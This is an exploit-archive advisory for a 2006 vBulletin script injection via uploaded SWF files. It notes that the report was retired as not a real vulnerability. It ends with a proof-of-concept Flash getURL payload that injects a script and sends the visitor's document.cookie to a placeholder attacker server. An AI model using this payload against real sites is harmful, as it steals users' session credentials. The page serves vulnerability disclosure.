vBulletin Remote Script Injection Vulnerability

vendor:

vBulletin

by:

SecurityFocus

N/A

CVSS

N/A

Remote Script Injection

None

CWE

Product Name: vBulletin

Affected Version From: None

Affected Version To: None

Patch Exists: NO

Related CWE: None

CPE: None

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2006

vBulletin Remote Script Injection Vulnerability

vBulletin is prone to a vulnerability that may let remote attackers inject arbitrary script code into the application. If exploited, this vulnerability may let attackers steal cookie-based authentication credentials. Other attacks are also possible. The ability to upload SWF files must be enabled by site administrators to expose this issue.

Mitigation:

Note that the ability to upload SWF files is disabled by default, and must be enabled by site administrators to expose this issue.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21736/info

vBulletin is prone to a vulnerability that may let remote attackers inject arbitrary script code into the application.

If exploited, this vulnerability may let attackers steal cookie-based authentication credentials. Other attacks are also possible.

Update: Note that the ability to upload SWF files is disabled by default, and must be enabled by site administrators to expose this issue.

This BID is being retired because further information shows that the application is not vulnerable to this issue.

getURL("javascript:function blab(){}var scriptNode = 
+document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie
+;blab();");